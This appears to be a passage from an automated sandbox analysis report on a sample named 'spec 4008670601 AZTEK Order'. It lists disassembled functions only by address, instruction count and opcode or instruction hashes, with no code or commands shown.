                                                      • Opcode Fuzzy Hash: 2e29d2d8ddb3abe92eb30041930e3ed446810da21b67abdf5309a24aa9bbd2d6
                                                      • Instruction Fuzzy Hash: 88815E71A00609AFDB26CFA9C880BEEFBFAFF48354F144429E555A7254DB30AD45CB60
                                                      Function 017BC640 Relevance: .2, Instructions: 206COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 526def8403ab6b7ac16b08de256ed700655625ac5156d1e5e3cad61efd2d2818
                                                      • Instruction ID: bfdae8a0097f9861468c04aec80cdeab4291f5f3482a71af1dbae588dd05ac52
                                                      • Opcode Fuzzy Hash: 526def8403ab6b7ac16b08de256ed700655625ac5156d1e5e3cad61efd2d2818
                                                      • Instruction Fuzzy Hash: E171DF75D00629DBCB268F59C9907FEFBB1FF59710F14815AE942AB390E3709940CB90
                                                      Function 018547A0 Relevance: .2, Instructions: 202COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 771d66dccc39a7e0cc7f438eac28abd3b40eaf742dec5867719cd12375294657
                                                      • Instruction ID: 8d2e4e4e7824de0506e026cde8b28b5c9a41a6da97b09829c2ebedd44db4c3c5
                                                      • Opcode Fuzzy Hash: 771d66dccc39a7e0cc7f438eac28abd3b40eaf742dec5867719cd12375294657
                                                      • Instruction Fuzzy Hash: 5871A270901205EFDBA1CF69D944A9ABBF9FF84301F28415AEA14E7259F7368B80CF54
                                                      Function 017B260B Relevance: .2, Instructions: 201COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 78e046400c392b588ed5d6831326344485066e989f3038173dfa93c04763a8ee
                                                      • Instruction ID: b3d9a60e0b40aefba73f1820b0edefba13bd74f35cc3071e497d5433c0b58167
                                                      • Opcode Fuzzy Hash: 78e046400c392b588ed5d6831326344485066e989f3038173dfa93c04763a8ee
                                                      • Instruction Fuzzy Hash: F371F1316052428FD312DF2CC484BAAF7E5FF84314F0485AAE898CB756EB34E946CB91
                                                      Function 0182035C Relevance: .2, Instructions: 198COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                      • Instruction ID: dd0c7f760964975dec0fce6b4bd7cba7810a90c28419d1cb07b91227af8ffef9
                                                      • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                      • Instruction Fuzzy Hash: 22715E71A00619EFDB11DFA9C984EEEBBB9FF48704F104569E505E7290DB34EA81CB90
                                                      Function 018362A0 Relevance: .2, Instructions: 198COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0b7b655eb6ae4a53f8e3c9d82a35521e2693f5d1a11da13658d4f5e8ead32da9
                                                      • Instruction ID: a1cf12155d7e8569cd598223c8fdac86ed74613f2534952e7b0c11ba04466c19
                                                      • Opcode Fuzzy Hash: 0b7b655eb6ae4a53f8e3c9d82a35521e2693f5d1a11da13658d4f5e8ead32da9
                                                      • Instruction Fuzzy Hash: F271D232600701BFE7229F1CC888F56BBE6EF84724F284418E655C72A1E775EB44CB90
                                                      Function 017A8AA0 Relevance: .2, Instructions: 197COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3a72b5214f668d8c678c9589914308ab990c2a958dea7db92e9ff36dab04c801
                                                      • Instruction ID: 22b55775cde257da6f576b8b14a9eac4bb85cb5675a94695855dde7c1bb2a4be
                                                      • Opcode Fuzzy Hash: 3a72b5214f668d8c678c9589914308ab990c2a958dea7db92e9ff36dab04c801
                                                      • Instruction Fuzzy Hash: 4C81B472A0431A8FDB25CF9CD988B6DF7B2BB88315F59422DD900AB295C7749E41CF90
                                                      Function 0185A250 Relevance: .2, Instructions: 184COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5ee303ed57e7dd4815320c239c8ec17ac8cb22e7a88bc824316ed4e2c7fc8804
                                                      • Instruction ID: 4f16ea754ab112880a6252b4fd1f3957aabe4082dbad0cc9c0fd0de2bf310e7d
                                                      • Opcode Fuzzy Hash: 5ee303ed57e7dd4815320c239c8ec17ac8cb22e7a88bc824316ed4e2c7fc8804
                                                      • Instruction Fuzzy Hash: 4151B172504612AFD755DEA8C8C8E5BBBE8EFC8754F010A29BE40DB150D770EE05C7A2
                                                      Function 01848350 Relevance: .2, Instructions: 161COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: eac05da19369b151bf52a059390daa3cb39114cc9c68006cdc9a56e26e154873
                                                      • Instruction ID: c7f2bb6004c0fa61e24827a0cbb34e8ab9be143c1776677e6f4eb98df38a10a5
                                                      • Opcode Fuzzy Hash: eac05da19369b151bf52a059390daa3cb39114cc9c68006cdc9a56e26e154873
                                                      • Instruction Fuzzy Hash: 4051E27090070DDFD721DF9AC884A6BFBF8BF55714F10461ED292976A1CBB0A645CB90
                                                      Function 017DE443 Relevance: .2, Instructions: 158COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2c166d8a15affc45525957b43856209f2ea6143c7c14a9ece3090e8dd8bdd29e
                                                      • Instruction ID: 4bb9fb800ad0ef84b05d5c21ed16c16b618a639b9b44c417d2f299d3d22c94f3
                                                      • Opcode Fuzzy Hash: 2c166d8a15affc45525957b43856209f2ea6143c7c14a9ece3090e8dd8bdd29e
                                                      • Instruction Fuzzy Hash: 07516B71600A09DFCB22EFA9C984EAAF3FDFB14784F400869E55297264DB34E940CB50
                                                      Function 01844180 Relevance: .2, Instructions: 156COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f1d9544e4f2f1b1942f42587a48d041fa9f729ab742928bd77ef371e85ca2580
                                                      • Instruction ID: 76aa8ba87efe7531d5cc89f928e4a294508dbeb3301e419670cca9d5e68085d6
                                                      • Opcode Fuzzy Hash: f1d9544e4f2f1b1942f42587a48d041fa9f729ab742928bd77ef371e85ca2580
                                                      • Instruction Fuzzy Hash: 5E517A7160834A9FD754DF29C881A6BBBE5BFC8708F44492DF599C7250EB30DA05CB52
                                                      Function 017C45B1 Relevance: .2, Instructions: 156COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                      • Instruction ID: fe139c4e59eaa5f2d8ca23fd7855df1a8d449c637979eda8831b5fc7242be587
                                                      • Opcode Fuzzy Hash: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                      • Instruction Fuzzy Hash: C1519E75E0020AABDF16DF98C854BEEFBB5AF44B50F04406DEA12AB240D734DA44CBA0
                                                      Function 0182E9E0 Relevance: .2, Instructions: 154COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                      • Instruction ID: cdfe20228c017acb2551508324bb287b8f5d829c93d57fbcba95900efedb2eab
                                                      • Opcode Fuzzy Hash: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                      • Instruction Fuzzy Hash: 6A51D931D0022EEFDF22DB94C894BAEBBB8AF04314F154655D612F7190D7709F808BA5
                                                      Function 01868B28 Relevance: .2, Instructions: 152COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 67a6187fc71e9a4e472952fd5efc229d6dc320be2ff41c14863814394e86e692
                                                      • Instruction ID: ca50577f0b1e7ac633de54c38ebf3f43ec25d237ce48f8204c11b8177bccc015
                                                      • Opcode Fuzzy Hash: 67a6187fc71e9a4e472952fd5efc229d6dc320be2ff41c14863814394e86e692
                                                      • Instruction Fuzzy Hash: 1F41E3B07017019BD729DB2DC894B7BBB9EEF92320F188219E95DCB284DB30DA01C791
                                                      Function 0182CBF0 Relevance: .1, Instructions: 148COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 18a26b5eb8071550bab4d0fa4e3ddd1637967b850bd7097987841445ea4b6066
                                                      • Instruction ID: 6b6d29995038a7cb29f34cfc2778c516614fcd3e171e15f31d4af96b10bb0a71
                                                      • Opcode Fuzzy Hash: 18a26b5eb8071550bab4d0fa4e3ddd1637967b850bd7097987841445ea4b6066
                                                      • Instruction Fuzzy Hash: DE518F7190022ADFCB22DFA9C984AAEBBB9FF48354B644519D545E7305E730AE81CFD0
                                                      Function 017DA430 Relevance: .1, Instructions: 139COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0a6e1bb6a101e43c3120f177c1065fe99694f3e5c0751fea3124902f102aadae
                                                      • Instruction ID: 519b3bc8ef7cb41f8522ee9945da4167bba61f5ea48491570d4b714792967c60
                                                      • Opcode Fuzzy Hash: 0a6e1bb6a101e43c3120f177c1065fe99694f3e5c0751fea3124902f102aadae
                                                      • Instruction Fuzzy Hash: 28412B72B002069BCB25EFA898C5F7AB774FB58718F5504ACED16DB249E7B1DA00CB50
                                                      Function 0186A9D3 Relevance: .1, Instructions: 139COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                      • Instruction ID: c7f9569d8638651d9db483a5d2dcc9948999d35e4988f4a433d3a52826d7774f
                                                      • Opcode Fuzzy Hash: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                      • Instruction Fuzzy Hash: DD41E5316017169FD729CF28C984A6EB7ADFF80315B05466EE912DB644EB31EE04C7D0
                                                      Function 017D01F8 Relevance: .1, Instructions: 138COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b835e1cfa0559e1fc730b4018c541360b9bdcf8864579848041d423eddf569f1
                                                      • Instruction ID: 3d913a2a7b2eb1399d72481caedbb91731d86efdc2b804843a16ac212867df9d
                                                      • Opcode Fuzzy Hash: b835e1cfa0559e1fc730b4018c541360b9bdcf8864579848041d423eddf569f1
                                                      • Instruction Fuzzy Hash: 25419B76D012199BDB14DF98C440AEEFBB4BF48710F14926EF915E7240DB35AD41CBA4
                                                      Function 017CEBFC Relevance: .1, Instructions: 138COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a92d9e885686a1c8579c06904da22c5051224726f5992e149b1eb4f8a7619a40
                                                      • Instruction ID: 50bc324ccacbb44569295e87da78ba602d169cadb4b8f689506b1e30240dca51
                                                      • Opcode Fuzzy Hash: a92d9e885686a1c8579c06904da22c5051224726f5992e149b1eb4f8a7619a40
                                                      • Instruction Fuzzy Hash: 6141C0712003069FD721DF28C884A6BFBE9FF88324F14486DEA57C7656EB35E9448B50
                                                      Function 017E2750 Relevance: .1, Instructions: 137COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                      • Instruction ID: 6a0918a545b93b2b91861b06e5649af6fc9f3de040e2ddff4f116945d82fd594
                                                      • Opcode Fuzzy Hash: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                      • Instruction Fuzzy Hash: E9516C76A01255CFCB19CF98C580AADF7BAFF84710F2481A9D915E7355D730AE81CB90
                                                      Function 017A6154 Relevance: .1, Instructions: 133COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0f203a4412fc7282e1ffed4eee2c1a39708f2d3331840173843cee9694cfe291
                                                      • Instruction ID: 8d26c4c6182ed33e8867b7a5f622ad4ff196471e093bf7ab24cf892793a15abb
                                                      • Opcode Fuzzy Hash: 0f203a4412fc7282e1ffed4eee2c1a39708f2d3331840173843cee9694cfe291
                                                      • Instruction Fuzzy Hash: 7451187090420ADBDB269B28CC48BE8FBB1EF55314F1843A5E515E72D5E7346A81CF40
                                                      Function 017A0BCD Relevance: .1, Instructions: 130COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 33e6dcc19136cae27b02779c547435b2b506ffca41f8931eb2d07bdfdeb88659
                                                      • Instruction ID: 2b9b2def0494248292c0768a20a53133328eaf43963ee9d1fcc4d0bf0cac641b
                                                      • Opcode Fuzzy Hash: 33e6dcc19136cae27b02779c547435b2b506ffca41f8931eb2d07bdfdeb88659
                                                      • Instruction Fuzzy Hash: 0D419531A002299FDB31DF68C944BEAF7B4EF45740F4105A9EA08AB395DB749E80CF91
                                                      Function 0186866E Relevance: .1, Instructions: 129COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                      • Instruction ID: 12f32ef8132d3c450727c3a69d2b3e366a85322d3bb34ca1b0b529aec9992ba0
                                                      • Opcode Fuzzy Hash: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                      • Instruction Fuzzy Hash: F0417275B10309ABEB15DF99CC94AAFBBBEAF89710F144069E908E7341DA74DF018760
                                                      Function 017A0887 Relevance: .1, Instructions: 128COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 37a551ab21febd16ab2feba4a78f3812330f1b67795cb03c6b8c50ccd9202f7e
                                                      • Instruction ID: 197f4375a2c1390a24900049efb03bbb17eed8ea1861d10ceae83fde0f43d688
                                                      • Opcode Fuzzy Hash: 37a551ab21febd16ab2feba4a78f3812330f1b67795cb03c6b8c50ccd9202f7e
                                                      • Instruction Fuzzy Hash: 3641BFB16007029FE325CF28C484A26FBF9FF88314B544A6DF54686A51E730F855CB90
                                                      Function 017CA470 Relevance: .1, Instructions: 127COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 79c17c9d6e715a0bb8c676d6b73085087eb79479ab4752167b846be43425c9e2
                                                      • Instruction ID: 553922feab5e35d9449d2c9ec04991d7b321c7b74d6e85cc3913e4f93917dfa3
                                                      • Opcode Fuzzy Hash: 79c17c9d6e715a0bb8c676d6b73085087eb79479ab4752167b846be43425c9e2
                                                      • Instruction Fuzzy Hash: EA41C132940609CFDB21CF68E9887EEFBB0BB18716F18459DD411B7285EB349A41CF50
                                                      Function 017A8BF0 Relevance: .1, Instructions: 124COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4619f44da580e149e81190b7114e8f331147289ce47c8ac52267c2c71b2a85d3
                                                      • Instruction ID: 52d846590ed7a167d245a2fe7245f2177cee34381c5b6116fece8f4cab8b37bd
                                                      • Opcode Fuzzy Hash: 4619f44da580e149e81190b7114e8f331147289ce47c8ac52267c2c71b2a85d3
                                                      • Instruction Fuzzy Hash: AD414532900206CFD725DF48C988B6AFBB2FBD8700F59826ED5019B259C374DA42CF91
                                                      Function 01798918 Relevance: .1, Instructions: 123COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 210b3dc8de4cdb51e659ef430fdc395bf41f4bda0c0fed59bb3547b49d27d264
                                                      • Instruction ID: 768579a09b27f443fa7f0a90a15771ec5643daa44cd94286f85839d0678317e5
                                                      • Opcode Fuzzy Hash: 210b3dc8de4cdb51e659ef430fdc395bf41f4bda0c0fed59bb3547b49d27d264
                                                      • Instruction Fuzzy Hash: E3416F325083069ED712DF65D840A6BF7E9EF89B54F40092EFA94D7250E731DE488BA3
                                                      Function 0179A020 Relevance: .1, Instructions: 122COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                      • Instruction ID: 78924b9e5583634430ad6c06fc42730a1370dcc7314dbba69fe91ce739b78538
                                                      • Opcode Fuzzy Hash: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                      • Instruction Fuzzy Hash: 2D412431A05212DBDF25DE2CD484BBBFBB1EB90754F1580AEAA458B344E7328D84CB90
                                                      Function 017A09AD Relevance: .1, Instructions: 122COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1cf68133a9025dcb1788fa6969fc5dfec33c88fb7a29a26abca165b0c76b2006
                                                      • Instruction ID: d9b202ec233fe8324d5240fdb686841d1b1b9457854e698e1772b6aa8aaccbdb
                                                      • Opcode Fuzzy Hash: 1cf68133a9025dcb1788fa6969fc5dfec33c88fb7a29a26abca165b0c76b2006
                                                      • Instruction Fuzzy Hash: 61415772601601EFD721CF18C884B66FBE4FF98314F648A6AF5498B251E771EA42CB90
                                                      Function 017D0710 Relevance: .1, Instructions: 121COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                      • Instruction ID: 1ae78dca3c2612782df4bd4324e31377b6716d02ae1471bc548af56250e5b155
                                                      • Opcode Fuzzy Hash: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                      • Instruction Fuzzy Hash: A641F671A00609EFDB24CF99C981AAAFBF9EB18710F10496DE556DB651D330EA44CB90
                                                      Function 017A262C Relevance: .1, Instructions: 119COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3947670871a5c634e372b8c3c58c4e428974b8cd494512362534ea6d14435791
                                                      • Instruction ID: 302492d10373390c48e122cd747a841e42de8ddeac4a5f23ec71f53622592a16
                                                      • Opcode Fuzzy Hash: 3947670871a5c634e372b8c3c58c4e428974b8cd494512362534ea6d14435791
                                                      • Instruction Fuzzy Hash: 93419271501705CFCB21EF28C944B55FBB1FF99310F54829DC6169B6A6EB309A41CF51
                                                      Function 017DC8F9 Relevance: .1, Instructions: 116COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2ece941df4d71a436b04399d5f7c5e620b1c1d53b9cc412cf6f5424d8407d58b
                                                      • Instruction ID: 7484063b1b75ef214cf17cb3d07d3a44341d3213af1e319e89a4900815e85af0
                                                      • Opcode Fuzzy Hash: 2ece941df4d71a436b04399d5f7c5e620b1c1d53b9cc412cf6f5424d8407d58b
                                                      • Instruction Fuzzy Hash: 223159B2A01249DFDB12CF58C480799BBF4EB49724F2085AED119EB251D7369A02CF90
                                                      Function 018207C3 Relevance: .1, Instructions: 114COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
